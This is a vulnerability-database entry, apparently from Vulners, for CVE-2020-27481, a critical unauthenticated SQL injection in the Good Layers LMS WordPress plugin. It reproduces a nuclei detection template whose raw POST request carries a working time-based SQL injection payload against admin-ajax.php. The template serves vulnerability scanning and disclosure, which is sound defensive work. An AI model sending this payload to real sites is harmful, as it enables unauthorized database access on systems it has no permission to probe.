Lucene search
K

Good Layers LMS Plugin <= 2.1.4 - SQL Injection

šŸ—“ļøĀ 03 Jun 2026Ā 06:04:49Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 23Ā Views

Good Layers LMS Plugin <= 2.1.4 - SQL Injection vulnerability

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-27481
12 Nov 202016:31
–circl
CNVD
GoodLayers LMS for Wordpress SQL Injection Vulnerability
19 Nov 202000:00
–cnvd
Check Point Advisories
SQL Injection Over HTTP Traffic (CVE-2020-11530; CVE-2020-17463; CVE-2020-17506; CVE-2020-25990; CVE-2020-27481; CVE-2020-5766; CVE-2020-8655; CVE-2020-8656; CVE-2020-9465)
18 Nov 202000:00
–checkpoint_advisories
CVE
CVE-2020-27481
12 Nov 202013:47
–cve
Cvelist
CVE-2020-27481
12 Nov 202013:47
–cvelist
NVD
CVE-2020-27481
12 Nov 202014:15
–nvd
OSV
CVE-2020-27481
12 Nov 202014:15
–osv
Prion
Sql injection
12 Nov 202014:15
–prion
RedhatCVE
CVE-2020-27481
22 May 202515:25
–redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2020-27481
10 Oct 202000:00
–vulncheck_kev
Rows per page
id: CVE-2020-27481

info:
  name: Good Layers LMS Plugin <= 2.1.4 - SQL Injection
  author: edoardottt
  severity: critical
  description: |
    An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin <= 2.1.4 exists due to the usage of "wp_ajax_nopriv" call in WordPress, which allows any unauthenticated user to get access to the function "gdlr_lms_cancel_booking" where POST Parameter "id" was sent straight into SQL query without sanitization.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade to the latest version of the Good Layers LMS Plugin (2.1.5 or higher) to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/652eaef8-5a3c-4a2d-ac60-b5414565c397
    - https://gist.github.com/0xx7/a7aaa8b0515139cf7e30c808c8d54070
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27481
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-27481
    cwe-id: CWE-89
    epss-score: 0.61049
    epss-percentile: 0.98336
    cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: goodlayers
    product: good_learning_management_system
    framework: wordpress
  tags: time-based-sqli,cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress,vkev,vuln

http:
  - raw:
      - |
        @timeout: 15s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(6)))MrMV)

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "status_code == 200"
          - "contains(body, 'goodlayers-lms') || contains(body, 'goodlms')"
        condition: and
# digest: 4a0a00473045022001e0f06593b0b4d5be34f70b31b399d6578f4afb56124c6233e2e17d9d0cdcb2022100f8cf723afb73df81420eabc0c041b2eb2e09ad3f0440affb526d6b529a244a1a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.61049
23